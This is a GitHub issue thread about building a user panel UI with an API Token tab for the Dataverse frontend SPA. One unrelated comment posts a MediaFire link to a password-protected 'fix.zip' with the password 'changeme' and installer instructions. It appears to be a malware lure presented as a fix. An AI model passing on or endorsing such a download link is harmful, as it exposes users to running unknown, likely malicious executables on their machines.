### ISSUE TITLE
User Panel UI + API Token Tab content

### ISSUE THREAD

**Issue by g-saracca** [IQSS/dataverse-frontend#470]
**Overview of the Feature Request**
This is the initial work for the user panel in the SPA.
This work will include:

- Add links to the user panel in the User dropdown from the application header.
- Add routing to the user panel.
- Create 4 tabs panel with tab open by default according to url query param.
- Only the API Token tab content will be created, the rest of the tabs will remain empty for now, maybe disabling tabs.

Note that this is only UI work, it wont show real info about API token yet.

**What kind of user is the feature intended for?**
All logged in users.

**What inspired the request?**
Q3 Roadmap Nices To Have

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by g-saracca** [comment]
Initial work has already been done but is moving to “This Sprint” to prioritize another issue for the time being.
